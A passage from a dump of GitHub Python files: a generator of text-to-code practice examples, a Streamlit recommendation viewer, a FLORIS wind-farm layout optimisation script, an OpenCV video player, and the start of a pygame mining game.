pass\n\n","repo_name":"KennethYangle/jz_ws","sub_path":"decision_maker/scripts/center_uav.py","file_name":"center_uav.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"12689800242","text":"import string\nimport numpy as np\nfrom typing import Optional, List\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass Function:\n name: str\n obj: Optional[str]\n args: List[List[str]]\n return_type: List[str]\n\n\n@dataclass\nclass Operator:\n name: str\n name_str: str\n args: List[List[str]]\n return_type: List[str]\n\n\n# Types\nany = [\"str\", \"int\", \"float\", \"bool\", \"list\"]\nnumber = [\"int\", \"float\"]\n\n# Variables\nvariables = {\n \"func\": [\"f\", \"g\"],\n \"any\": [\"x\", \"y\", \"z\"],\n \"number\": [\"x\", \"y\", \"z\"],\n \"str\": [\"x\", \"y\", \"s\", \"t\"],\n \"int\": [\"x\", \"y\", \"i\", \"n\"],\n \"float\": [\"x\", \"y\", \"z\", \"f\"],\n \"bool\": [\"x\", 
\"y\", \"c\", \"cond\"],\n \"list\": [\"xs\", \"ys\", \"values\"],\n}\n\n# Builtin Functions\nfunctions = [\n Function(\"print\", None, [any], []),\n Function(\"append\", \"list\", [any], []),\n Function(\"insert\", \"list\", [\n [\"int\"], any], []),\n Function(\"len\", None, [[\"list\"]], [\"int\"]),\n Function(\"str\", None, [any], [\"str\"]),\n Function(\"range\", None, [[\"int\"]], [\"list\"]),\n Function(\"@get\", None, [[\"list\"], [\"int\"]], any),\n Function(\"@del\", None, [[\"list\"], [\"int\"]], []),\n]\noperators = [\n # Operator(\"+\", \"plus\", [[\"int\"], [\"int\"]], \"int\"),\n # Operator(\"-\", \"minus\", [[\"int\"], [\"int\"]], \"int\"),\n # Operator(\"*\", \"multiply\", [[\"int\"], [\"int\"]], \"int\"),\n Operator(\"+\", \"plus\", [number, number], number),\n Operator(\"-\", \"minus\", [number, number], number),\n Operator(\"*\", \"multiply\", [number, number], number),\n Operator(\"/\", \"divide\", [number, number], number),\n Operator(\"//\", \"divide as integer\", [number, number], [\"int\"]),\n Operator(\"%\", \"modulo\", [[\"int\"], [\"int\"]], [\"int\"]),\n Operator(\"**\", \"power of\", [number, number], number),\n Operator(\"in\", \"in\", [any, [\"list\"]], [\"bool\"]),\n Operator(\"is\", \"is\", [any, any], [\"bool\"]),\n Operator(\"==\", \"equal\", [any, any], [\"bool\"]),\n Operator(\"!=\", \"not equal\", [any, any], [\"bool\"]),\n]\ninplaces = [\"+\", \"-\", \"*\", \"/\", \"//\", \"%\"]\n\n\n@dataclass\nclass Example:\n text: str\n code: str\n\n\nclass Generator:\n def __init__(self, rng: np.random.RandomState):\n self.rng = rng\n\n def _create_variable(self, t: str) -> Example:\n v = self.rng.choice(variables[t])\n return Example(v, v)\n\n def _create_constant(self, t: str) -> Example:\n if t == \"int\":\n i = str(self.rng.randint(0, 100))\n return Example(i, i)\n elif t == \"float\":\n f = \"{:.2f}\".format(self.rng.rand())\n return Example(f, f)\n elif t == \"str\":\n n = self.rng.randint(0, 10)\n t = ''.join(self.rng.choice(list(string.ascii_letters), size=n))\n return Example(t, f'\"{t}\"')\n elif t == \"bool\":\n b = self.rng.choice([\"True\", \"False\"])\n return Example(b.lower(), b)\n elif t == \"list\":\n n = self.rng.randint(0, 3)\n if n == 0:\n return Example(\"the empty list\", \"[]\")\n else:\n subtype = self.rng.choice(any)\n text = \"the list of\"\n code = \"[\"\n for elem in [self._create_constant(subtype) for _ in range(n)]:\n text += f\" {elem.text}\"\n code += f\"{elem.code}, \"\n code += \"]\"\n return Example(text, code)\n raise AssertionError(f\"invalid type: {t}\")\n\n def _create_function_call(self, f: Optional[Function] = None) -> Example:\n if f is None:\n f = self.rng.choice(functions)\n\n if f.name.startswith(\"@\"):\n # specific function\n args = [self._create_constant(self.rng.choice(ts))\n for ts in f.args]\n if f.name == \"@get\":\n return Example(\n f\"{args[1].text} element of {args[0].text}\",\n f\"{args[0].code}[{args[1].code}]\"\n )\n elif f.name == \"@del\":\n return Example(\n f\"delete {args[1].text} element from {args[0].text}\",\n f\"del {args[0].code}[{args[1].code}]\"\n )\n raise AssertionError(f\"invalid function name: {f.name}\")\n if f.obj is None:\n # function\n text = f\"{f.name}\"\n code = f\"{f.name}(\"\n else:\n # method\n obj = self._create_variable(f.obj)\n text = f\"{obj.text} {f.name}\"\n code = f\"{obj.text}.{f.name}(\"\n for arg in [self._create_constant(self.rng.choice(ts))\n for ts in f.args]:\n text += f\" {arg.text}\"\n code += f\"{arg.code},\"\n code += \")\"\n return Example(text, code)\n\n def 
_create_operator(self, op: Optional[Operator] = None) -> Example:\n if op is None:\n op = self.rng.choice(operators)\n use_str = self.rng.choice([False, True])\n if use_str:\n op_str = op.name_str\n else:\n op_str = op.name\n\n text = \"\"\n code = \"(\"\n args = [self._create_constant(self.rng.choice(ts)) for ts in op.args]\n for i, arg in enumerate(args):\n text += arg.text\n code += arg.code\n if i != len(args) - 1:\n text += f\" {op_str} \"\n code += f\" {op.name} \"\n code += \")\"\n return Example(text, code)\n\n def _create_expression(self, types: List[str]) -> Example:\n t = self.rng.choice(types)\n funcs = [f for f in functions\n if t in f.return_type or f.return_type == types]\n ops = [f for f in operators\n if t in f.return_type or f.return_type == types]\n cands = [\"constant\"] + [\"variable\"]\n if len(funcs) != 0:\n cands.append(\"function\")\n if len(ops) != 0:\n cands.append(\"operator\")\n c = self.rng.choice(cands)\n\n if c == \"constant\":\n return self._create_constant(t)\n elif c == \"variable\":\n return self._create_variable(t)\n elif c == \"function\":\n return self._create_function_call(self.rng.choice(funcs))\n elif c == \"operator\":\n return self._create_operator(self.rng.choice(ops))\n raise AssertionError(f\"invalid candidate: {c}\")\n\n def _create_assign(self) -> Example:\n t = self.rng.choice(any + [\"any\", \"number\"])\n x = self._create_variable(t)\n if t == \"number\":\n ts = number\n elif t == \"any\":\n ts = any\n else:\n ts = [t]\n v = self._create_expression(ts)\n return Example(\n f\"assign {x.text} with {v.text}\",\n f\"{x.code} = {v.code}\"\n )\n\n def _create_inplace(self) -> Example:\n inplace_op = self.rng.choice(inplaces)\n op = [op for op in operators if op.name == inplace_op][0]\n t = self.rng.choice(op.args[0])\n x = self._create_variable(t)\n v = self._create_expression(op.args[1])\n return Example(\n f\"assign {x.text} with {x.text} {op.name} {v.text}\",\n f\"{x.code} {op.name}= {v.code}\"\n )\n\n def _create_suite(self) -> Example:\n n = self.rng.randint(1, 3)\n funcs = [f for f in functions if f.return_type == []]\n funcs.extend([\"assign\", \"inplace\"])\n text = \"\"\n code = \"\"\n for i in range(n):\n x = self.rng.choice(funcs)\n if isinstance(x, Function):\n e = self._create_function_call(x)\n elif x == \"assign\":\n e = self._create_assign()\n elif x == \"inplace\":\n e = self._create_inplace()\n text += e.text\n code += e.code\n if i != (n - 1):\n text += \", \"\n code += \"\\n\"\n return Example(text, code)\n\n def _indent(self, text: str) -> str:\n lines = text.split(\"\\n\")\n lines = [\" \" + line for line in lines]\n return \"\\n\".join(lines)\n\n def _create_if(self) -> Example:\n has_elif = self.rng.choice([False, True])\n has_else = self.rng.choice([False, True])\n\n text = \"\"\n code = \"\"\n\n # if statement\n c = self._create_expression([\"bool\"])\n body = self._create_suite()\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} if {c.text}.\"\n else:\n text += f\"if {c.text} do followings: {body.text}.\"\n code += f\"if {c.code}:\\n\" + self._indent(body.code)\n\n # elif statement\n if has_elif:\n c = self._create_expression([\"bool\"])\n body = self._create_suite()\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} if {c.text}.\"\n else:\n text += f\"if {c.text} do followings: {body.text}.\"\n code += f\"\\nelif {c.code}:\\n\" + self._indent(body.code)\n\n # else statement\n if has_else:\n body = self._create_suite()\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"otherwise 
{body.text}.\"\n else:\n text += f\"otherwise do followings: {body.text}.\"\n code += \"\\nelse:\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def _create_while(self):\n c = self._create_expression([\"bool\"])\n body = self._create_suite()\n text = \"\"\n code = \"\"\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} while {c.text}.\"\n else:\n text += f\"while {c.text} do followings: {body.text}.\"\n code += f\"while {c.code}:\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def _create_for(self):\n x = self._create_variable(\"any\")\n xs = self._create_expression([\"list\"])\n body = self._create_suite()\n text = \"\"\n code = \"\"\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} for each {x.text} in {xs.text}.\"\n else:\n text += \\\n f\"for each {x.text} in {xs.text} do followings: {body.text}.\"\n code += f\"for {x.code} in {xs.code}:\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def _create_funcdef(self):\n name = self._create_variable(\"func\")\n n_arg = self.rng.randint(0, 3)\n args = [self._create_variable(\"any\") for _ in range(n_arg)]\n\n body = self._create_suite()\n text = \"\"\n code = \"\"\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} when {name.text}.\"\n else:\n text += \\\n f\"when {name.text} is called do followings: {body.text}.\"\n args_code = \",\".join([arg.code for arg in args])\n code += f\"def {name.code}({args_code}):\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def create(self) -> Example:\n cands = [self._create_funcdef, self._create_for, self._create_while,\n self._create_if, self._create_assign, self._create_inplace,\n self._create_function_call, self._create_operator]\n c = self.rng.choice(cands)\n return c()\n","repo_name":"HiroakiMikami/python-introductory-qa","sub_path":"app/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":11101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"37573104380","text":"import streamlit as st\n#from requests_toolbelt.multipart.encoder import MultipartEncoder\nimport requests\nfrom PIL import Image\nimport io\nimport joblib\nfrom abcd import predict\nimport pandas as pd\n\n\nst.title('Microsoft Recommendation Algorithms for SNACKS')\nimage = Image.open('snack.jpg')\n\nst.image(image,use_column_width=True)\n\nst.markdown('',unsafe_allow_html=True)\nst.markdown('*ALGORITHMS FOR SNACKS SELECTION*')\n\n# Models\nrlrmc = open(\"GRU4Rec.SAV\",\"rb\")\nrlrmc_model = joblib.load(rlrmc)\nurl = 'http://127.0.0.1:8000/'\nendpoint = 'predict/'\n\ndef get_data(user_id,pro_id):\n server_url = url + endpoint + str(user_id) + ',' + str(pro_id)\n r= requests.get(server_url)\n return r.json()\n\nradio = st.radio(\n \"Choose an algorithm-->\",\n (\"GRU4Rec Algorithm\",\"LightGCN Algorithm\"))\n\nif radio == 'LightGCN Algorithm':\n \n title = st.number_input('User ID',min_value = 0,max_value=1000,value = 0,step =1)\n \n \n data = pd.read_csv('LightGCN.csv')\n df1 = data['userID']==title\n df2 = data[df1]\n data = pd.DataFrame(df2.iloc[:,1:4])\n\n st.dataframe(data)\n \n\nif radio == 'GRU4Rec Algorithm':\n \n title = st.number_input('User ID',min_value = 0,max_value=1000,value = 0,step =1)\n \n \n data = pd.read_csv('GRU4Rec.csv')\n df1 = data['userID']==title\n df2 = data[df1]\n data = pd.DataFrame(df2.iloc[:,1:4])\n\n st.dataframe(data)\n \n#image = Image.open('snack.jfif')\n\n#st.image(image, caption='Snack 
Recommendation',use_column_width=True)\n\n\n","repo_name":"YashPandya2001/Algorithmic-Digital-Marketing","sub_path":"Assignment_3/FastAPI & Streamlit/streamlit12.py","file_name":"streamlit12.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3474882349","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 11 07:52:00 2023\n\n@author: youssef\n\"\"\"\n\n\nimport os\nos.environ['SNOPT_LICENSE'] = '/home/youssef/snopt/snopt7.lic'\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom floris.tools import FlorisInterface\nfrom floris.tools.optimization.layout_optimization.layout_optimization_pyoptsparse import LayoutOptimizationPyOptSparse\nimport pdb\n# from floris.tools import visualize_cut_plane #, plot_turbines_with_fi\n# import floris.tools as wfct\n# import shapely\nfrom shapely.geometry import Polygon, LineString, Point\n\n\ndef sort_boundaries(boundaries):\n bnd=pd.DataFrame(boundaries, columns=['x','y'])\n bnd.mean()\n A=np.degrees(np.arctan2(bnd.y-bnd.mean()[1],bnd.x-bnd.mean()[0]))\n A %= 360\n A.sort_values()\n boundaries=bnd.reindex(A.sort_values().index).values.tolist()\n return boundaries\n\n\ndef ConcentricCirclesLayout(N_circles,spc,D):\n spc=spc*D\n y_coordinates=np.array(0)\n x_coordinates=np.array(0)\n for i in range(N_circles):\n i=i+1\n N_turbines=math.floor(2*np.pi*i)\n angles=np.arange(0,2*np.pi,2*np.pi/N_turbines)\n x_coordinates=np.append(x_coordinates, i*spc*np.cos(angles))\n y_coordinates=np.append(y_coordinates, i*spc*np.sin(angles))\n x_coordinates=np.round(x_coordinates)\n y_coordinates=np.round(y_coordinates)\n layout= (x_coordinates.tolist(), y_coordinates.tolist())\n \n return layout\n\n\ndef SNOPTlayoutoptimization(fi,layout0,wd, ws, freq,optOptions,minimum_D):\n fi.reinitialize(layout=layout0,\n wind_directions=wd,\n wind_speeds=ws)\n layout_opt = LayoutOptimizationPyOptSparse(fi, boundaries, freq=freq,solver=\"SNOPT\",\n optOptions=optOptions,storeHistory=None,min_dist=minimum_D) \n layout_opt.optimize()\n xopt, yopt=layout_opt.get_optimized_locs()\n layout=(xopt,yopt)\n \n layout_opt.plot_layout_opt_results()\n plt.show()\n return layout\n\ndef savelayout(layout,path,filename):\n layoutdf=pd.DataFrame(layout[0],columns=['x'])\n layoutdf['y']=layout[1]\n layoutdf.to_csv(path+filename, index=False)\n\n\n############## Inputs ############## \nmindist = 4\nspc = 6 # maximum spacing at the beginning of the simulation for boundary creation\nshape ='square'\nno_circles_squares =2 \nno_turbines = 25 \nfile_number = f'{mindist}{mindist}{mindist}{no_turbines}{no_turbines}{no_turbines}'\nwindrose = 'iea'\n\nTi = 0.06\n\n############################ \n\npath =fr\"../Results_{windrose}/Results_{mindist}_{spc}\"\nangle=1\n\n\nopt_baseline_file =f'/SNOPTlayoutnew_{shape}_{no_turbines}T_{windrose}.csv'\nsum_print='SNOPTlayoutnew_{shape}_{no_turbines}T_{windrose}.out'\n\n\n# Initialize the FLORIS interface fi\nfi = FlorisInterface('../Inputs/gch15MW.yaml')\nD = fi.floris.farm.rotor_diameters_sorted[0][0][0]\nfi.floris.flow_field.turbulence_intensity=Ti\n\n############## Circle ############## \nif shape=='circle':\n N_circles=no_circles_squares\n spacing=spc*D\n angles=np.arange(0,360+angle,angle)\n boundaries_x=np.round(((N_circles*spacing)+0.01*D)*np.cos(np.radians(angles)))\n boundaries_y=np.round(((N_circles*spacing)+0.01*D)*np.sin(np.radians(angles)))\n boundaries = [[x,y] for x, y in 
zip(boundaries_x, boundaries_y)]\n # boundaries=sort_boundaries(boundaries)\n layout0=ConcentricCirclesLayout(N_circles,spc,D) \n\n\n############## Square ############## \n## D=240\nif shape=='square':\n N_squares=no_circles_squares\n spc=spc*D\n y_coordinates=np.tile(np.arange(-spc*N_squares,spc*N_squares+spc,spc),1+N_squares*2)\n x_coordinates=np.repeat(np.arange(-spc*N_squares,spc*N_squares+spc,spc),1+N_squares*2)\n x_coordinates=np.round(x_coordinates)\n y_coordinates=np.round(y_coordinates)\n layout0= (x_coordinates.tolist(), y_coordinates.tolist())\n \n boundaries_x=np.round((min(layout0[0])-0.01*D,min(layout0[0])-0.01*D,\n max(layout0[0])+0.01*D,max(layout0[0])+0.01*D,\n min(layout0[0])-0.01*D),decimals=2)\n boundaries_y=np.round((min(layout0[0])-0.01*D,max(layout0[0])+0.01*D,\n max(layout0[0])+0.01*D,min(layout0[0])-0.01*D,\n min(layout0[0])-0.01*D),decimals=2)\n boundaries = [[x,y] for x, y in zip(boundaries_x, boundaries_y)]\n boundaries = pd.DataFrame(boundaries, columns=['x','y'])\n boundaries=boundaries.values.tolist()\n\n\nboundarypolygon = Polygon(boundaries)\nboundaryline = LineString(boundaries)\nboundarycon = np.zeros(len(layout0[0]))\nfor i in range(len(layout0[0])):\n loc = Point(layout0[0][i], layout0[1][i])\n boundarycon[i] = loc.distance(boundaryline)\n if boundarypolygon.contains(loc)==True:\n boundarycon[i] *= -1.0\n \nif not all(boundarycon<0):\n print('not all turbines lie within the boundaries at initialization')\n########################### \n\n############################ iea task ############################\nif windrose =='iea':\n print('############################ iea windrose ############################')\n wd=[0., 22.5, 45., 67.5, 90., 112.5, 135., 157.5, 180., 202.5, 225., 247.5, 270., 292.5, 315., 337.5]\n ws=[10]\n freq_d= [.025, .024, .029, .036,.063, .065, .100, .122,.063, .038, .039, .083, .213, .046, .032, .022]\n ########################################################\nif windrose =='alpha':\n print(' ########################### alpha ventus windrose ############################')\n wd=[0., 22.5, 45., 67.5, 90., 112.5, 135., 157.5, 180., 202.5, 225., 247.5, 270., 292.5, 315., 337.5]\n ws=[10]\n freq_d=[0.0313,0.0402,0.0375, 0.0568,0.0558,0.0608, 0.0424,0.0564,0.0555, 0.1114,0.0932,0.1114, 0.0722,\n 0.0743,0.0500, 0.0508]\n # #######################################################\n \nfreq=np.transpose(np.array([freq_d]))\nfi.reinitialize(layout=layout0,\n wind_directions=wd,\n wind_speeds=ws)\n\nAEP_initial = fi.get_farm_AEP(freq=freq)* 1e-9\nprint(\"=====================================================\")\nprint('AEP_initial='+str(AEP_initial))\nprint(\"=====================================================\")\n\noptOptions={\"Major feasibility tolerance\": 1e-6, \n # \"Verify level\": 3, \n \"Scale option\":0 ,\n # \"Function precision\": 1e-6,\n # \"Major optimality tolerance\": 5e-5,\n \"Major optimality tolerance\": 1e-3,\n # \"Derivative level\":1, \n \"iPrint\": int(file_number)-1,\n \"iSumm\": int(file_number),\n 'Print file':'print_'+sum_print,\n 'Summary file':'sum_'+sum_print,\n # \"Linesearch tolerance\": 0.01\n }\nlayout=SNOPTlayoutoptimization(fi,layout0,wd, ws, freq,optOptions,minimum_D=mindist*D)\nfi.reinitialize(layout=layout)\nAEP_optimized= fi.get_farm_AEP(freq=freq)* 1e-9\nprint(\"=====================================================\")\nprint('AEP_current='+str(AEP_optimized))\nprint(\"=====================================================\")\n\n\nsavelayout(layout, path+ '/BaselineOptimization' , 
opt_baseline_file)\npdb.set_trace()\n\n\n# 18, 19 square 9 turbines\n# 16, 17 square 25 turbines\n# 14, 15 circle 37 turbines\n# 12, 13 circle 19 turbines\n# 122, 133 circle 19 turbines rounded\n# 1222, 1333 circle 19 turbines rounded FDR\n# 144, 155 circle 37 turbines shapely\n# 1012, 1013 circle 19 turbines np.arange(0,370,10) playing with boarders no shapely","repo_name":"alda30/FloatingWAYS","sub_path":"Layoutoptimization/BaselineOpt.py","file_name":"BaselineOpt.py","file_ext":"py","file_size_in_byte":7460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"3675639735","text":"# importing libraries \nimport cv2 \nimport numpy as np \nimport argparse\n\n# import arguments\nparser = argparse.ArgumentParser(description='Video Player')\nparser.add_argument('--video_file_path', dest='video_file_path', type=str, help='File path of the video')\nparser.add_argument('--fps', dest='fps', type=str, help='Framerate')\nparser.add_argument('--display_resolution_width', dest='display_resolution_width', type=int, help='Width resolution')\nparser.add_argument('--display_resolution_height', dest='display_resolution_height', type=int, help='Height resolution')\nparser.add_argument('--monochrome', dest='monochrome', type=bool, help='Monochrome filter')\nargs = parser.parse_args()\n\n\n\n# press p to pause b to step back a frame\n\nvideo_file_path = args.video_file_path\nfps = args.fps \ndisplay_resolution_width = args.display_resolution_width\ndisplay_resolution_height= args.display_resolution_height\nmonochrome = args.monochrome\n# Use default if arguments have not been provided\nif args.video_file_path is None:\n video_file_path = 'video_1.mp4'\n fps = 30\n monochrome = False\n display_resolution_width = 1280\n display_resolution_height = 720\n# Create a VideoCapture object and read from input file \ncap = cv2.VideoCapture(video_file_path)\ncap.set(cv2.CAP_PROP_FPS, fps) # set frame rate \n\n# retrieve the total number of frames\nframe_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\ndef change_res(display_resolution_width,display_resolution_height):\n cap.set(3, display_resolution_width)\n cap.set(4, display_resolution_height)\nchange_res(display_resolution_width,display_resolution_height)\n\ndef rescale_frame(frame, percent=75):\n width = int(frame.shape[1] * percent/ 100)\n height = int(frame.shape[0] * percent/ 100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)\n\n# Check if camera opened successfully \nif (cap.isOpened()== False): \n print(\"Error opening video file\") \n \n# Read until video is completed \nwhile(cap.isOpened()): \n \n # Capture frame-by-frame \n ret, frame = cap.read()\n frame150 = rescale_frame(frame, percent=400)\n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n (thresh, blackAndWhiteFrame) = cv2.threshold(grayFrame, 127, 255, cv2.THRESH_BINARY) \n if ret == True:\n # make video monochrome \n if monochrome == True:\n cv2.imshow('video bw', blackAndWhiteFrame)\n else:\n # Display the resulting frame \n cv2.imshow('Frame', frame150) \n key = cv2.waitKey(1) & 0xff\n if key == ord('p'):\n # sleep here until a valid key is pressed\n while (True):\n key = cv2.waitKey(0)\n\n # check if 'p' is pressed and resume playing\n if (key & 0xFF == ord('p')):\n break\n\n # check if 'b' is pressed and rewind video to the previous frame. 
You must press p to resume playing again.\n if (key & 0xFF == ord('b')):\n cur_frame_number = cap.get(cv2.CAP_PROP_POS_FRAMES)\n print('* At frame #' + str(cur_frame_number))\n\n prev_frame = cur_frame_number\n if (cur_frame_number > 1):\n prev_frame -= 1\n\n print('* Rewind to frame #' + str(prev_frame))\n cap.set(cv2.CAP_PROP_POS_FRAMES, prev_frame)\n\n # Press Q on keyboard to exit \n if cv2.waitKey(25) & 0xFF == ord('q'): \n break\n \n # Break the loop \n else: \n break\n \n# When everything done, release \n# the video capture object \ncap.release() \n \n# Closes all the frames \ncv2.destroyAllWindows() \n\n","repo_name":"tonymao8/ComputerVisionSegmentation","sub_path":"video_playback.py","file_name":"video_playback.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73679527639","text":"import pygame, sys, math, shop\nfrom manage_map import load_map, save_map\nfrom vars import blocks_type\n\n\nclass ShopButton : \n def __init__(self, text, pos, font, bg=\"black\", feedback=\"\"):\n self.x, self.y = pos\n self.font = pygame.font.SysFont(\"Arial\", font)\n self.surface = self.font.render(text, True, bg)\n self.text = self.font.render(text, 1, pygame.Color(\"White\"))\n self.size = self.text.get_size()\n self.rect = pygame.Rect(self.x, self.y, self.size[0], self.size[1])\n if feedback == \"\":\n self.feedback = \"text\"\n else:\n self.feedback = feedback\n \n def display_shop():\n shop.main()\n \n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n \n def click(self, event):\n x, y = pygame.mouse.get_pos()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if pygame.mouse.get_pressed()[0]:\n if self.rect.collidepoint(x, y):\n shop.main()\n\n\nclass Crosshair(pygame.sprite.Sprite):\n global blocks_sprites, player, block_size\n\n def __init__(self, groups):\n super().__init__(groups)\n self.image = pygame.Surface((1, 1))\n self.image.fill(\"red\")\n self.rect = self.image.get_rect()\n self.rect.center = pygame.mouse.get_pos()\n self.box = pygame.image.load(\"ores/select.png\").convert_alpha()\n\n def update(self, offset_y):\n self.image = pygame.Surface((1, 1))\n self.rect = self.image.get_rect()\n self.rect.center = pygame.mouse.get_pos()\n collisions = pygame.sprite.spritecollide(self, blocks_sprites, False)\n if collisions:\n for block in collisions:\n if math.dist(player.rect.center, block.rect.center) < block_size * 2:\n if not block.mined:\n self.image = self.box\n self.rect = block.rect.copy()\n if pygame.mouse.get_pressed()[0]:\n block.mine()\n\n\nclass BlockType:\n def __init__(\n self,\n name,\n price,\n sturdiness,\n image,\n world_id,\n vein_size,\n rarity,\n height_min,\n height_max,\n ):\n self.name = name\n self.price = price\n self.sturdiness = sturdiness\n self.world_id = world_id\n self.vein_size = vein_size\n self.rarity = rarity\n self.height_min = height_min\n self.height_max = height_max\n self.image = f\"ores/{image}\"\n\n\nclass Block(pygame.sprite.Sprite):\n global screen_width, screen_height, blocks_sprites, player\n\n def __init__(self, pos, blocktype: BlockType, groups):\n super().__init__(groups)\n self.blocktype = blocktype\n self.image = pygame.image.load(blocktype.image).convert_alpha()\n self.rect = self.image.get_rect(topleft=pos)\n self.old_rect = self.rect.copy()\n self.mined = False\n self.mining_progress = 0\n\n def update(self, offset_y):\n self.old_rect = self.rect.copy()\n self.rect.y -= offset_y\n if self.mining_progress >= 
self.blocktype.sturdiness:\n self.mined = True\n player.add_to_inventory(self.blocktype)\n self.kill()\n elif self.mining_progress > self.blocktype.sturdiness // 2:\n self.image.set_alpha(128)\n\n def mine(self, decrement=1):\n self.mining_progress += decrement\n\n def save(self):\n return [self.blocktype.name, self.rect.topleft, self.mining_progress]\n\n\nclass Player(pygame.sprite.Sprite):\n global screen_width, screen_height, gravity, blocks_sprites\n\n def __init__(self, username, pos, size, groups):\n super().__init__(groups)\n self.username = username\n self.image = pygame.Surface(size)\n self.image.fill(\"red\")\n self.rect = self.image.get_rect(topleft=pos)\n self.old_rect = self.rect.copy()\n self.pos = pygame.math.Vector2(self.rect.center)\n self.direction = pygame.math.Vector2()\n self.speed = 5\n self.on_ground = False\n self.fall_count = 0\n self.pickaxe = None\n self.backpack = None\n self.inventory = {}\n self.balance = 0\n\n def collision(self, direction):\n collision_sprites = pygame.sprite.spritecollide(self, blocks_sprites, False)\n if collision_sprites:\n if direction == \"horizontal\":\n for sprite in collision_sprites:\n # collision on the right\n if (\n self.rect.right >= sprite.rect.left\n and self.old_rect.right <= sprite.old_rect.left\n ):\n self.rect.right = sprite.rect.left\n self.pos.x = self.rect.x\n\n # collision on the left\n if (\n self.rect.left <= sprite.rect.right\n and self.old_rect.left >= sprite.old_rect.right\n ):\n self.rect.left = sprite.rect.right\n self.pos.x = self.rect.x\n\n if direction == \"vertical\":\n for sprite in collision_sprites:\n # collision on the bottom\n if (\n self.rect.bottom >= sprite.rect.top\n and self.old_rect.bottom <= sprite.old_rect.top\n ):\n self.rect.bottom = sprite.rect.top\n self.pos.y = self.rect.y\n self.on_ground = True\n self.fall_count = 0\n self.direction.y = 0\n\n # collision on the top\n if (\n self.rect.top <= sprite.rect.bottom\n and self.old_rect.top >= sprite.old_rect.bottom\n ):\n self.rect.top = sprite.rect.bottom\n self.pos.y = self.rect.y\n self.direction.y *= -1\n\n def window_collision(self, direction):\n if direction == \"horizontal\":\n # collision on the right\n if self.rect.right > screen_width:\n self.rect.right = screen_width\n self.pos.x = self.rect.x\n\n # collision on the left\n if self.rect.left < 0:\n self.rect.left = 0\n self.pos.x = self.rect.x\n\n def move(self):\n keys = pygame.key.get_pressed()\n if keys[pygame.K_i]: # debug inventory\n print(self.inventory)\n\n if keys[pygame.K_q] or keys[pygame.K_LEFT]:\n self.direction.x = -1 * self.speed\n elif keys[pygame.K_d] or keys[pygame.K_RIGHT]:\n self.direction.x = 1 * self.speed\n else:\n self.direction.x = 0\n if (keys[pygame.K_SPACE] or keys[pygame.K_UP]) and self.on_ground:\n self.direction.y = -gravity * self.speed\n self.on_ground = False\n\n def add_to_inventory(self, blocktype: BlockType):\n if blocktype.name not in self.inventory:\n self.inventory[blocktype.name] = 0\n self.inventory[blocktype.name] += 1\n\n def sell_inventory(self):\n for blocktype in self.inventory:\n self.balance += self.inventory[blocktype] * blocktype.price\n self.inventory = {}\n\n def update(self, offset_y):\n self.old_rect = self.rect.copy()\n self.pos.y -= offset_y\n self.direction.y += min(1, (self.fall_count / 60) * gravity)\n if self.fall_count < 60:\n self.fall_count += 1\n self.move()\n self.pos += self.direction\n self.rect.x = round(self.pos.x)\n self.rect.y = round(self.pos.y)\n self.window_collision(\"horizontal\")\n 
self.collision(\"horizontal\")\n self.window_collision(\"vertical\")\n self.collision(\"vertical\")\n\n def save(self):\n return [self.rect.topleft, self.inventory, self.balance, self.pickaxe, self.backpack]\n\n\nclass Pickaxe:\n def __init__(self, name, mining_speed):\n self.name = name\n self.mining_speed = mining_speed\n\n\nscreen_width = 800\nscreen_height = 600\nblock_size = 32\nplayer_size = (24, 56)\ngravity = 1\nscroll_area = 200\noffset_y = 0\nground_level = screen_height - 10 * block_size\n\n\nall_sprites = pygame.sprite.Group()\nblocks_sprites = pygame.sprite.Group()\n\n\ndef create_block_classes():\n for blocktype in blocks_type:\n block_class = type(blocktype[\"name\"], (BlockType,), {})\n globals()[blocktype[\"name\"]] = block_class(\n blocktype[\"name\"],\n blocktype[\"price\"],\n blocktype[\"sturdiness\"],\n blocktype[\"image\"],\n blocktype[\"world_id\"],\n blocktype[\"vein_size\"],\n blocktype[\"rarity\"],\n blocktype[\"height_min\"],\n blocktype[\"height_max\"],\n )\n\n\ndef create_map(map):\n \"\"\"Create the map from a list of blocks.\"\"\"\n global blocks_sprites, all_sprites\n for block in map:\n if block[0] != \"Air\":\n Block(\n block[1],\n globals()[block[0]],\n [all_sprites, blocks_sprites],\n )\n\n\npygame.init()\npygame.display.set_caption(\"DigDeep\")\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode((screen_width, screen_height))\nplayer = Player(\"eole\", (screen_width / 2, 0), player_size, all_sprites)\ncrosshair = Crosshair(all_sprites)\ncreate_block_classes()\nmap, saved_player = load_map(player, block_size, screen_width // 32)\ncreate_map(map)\nif saved_player:\n player.inventory = saved_player[1]\n player.balance = saved_player[2]\n player.pickaxe = saved_player[3]\n 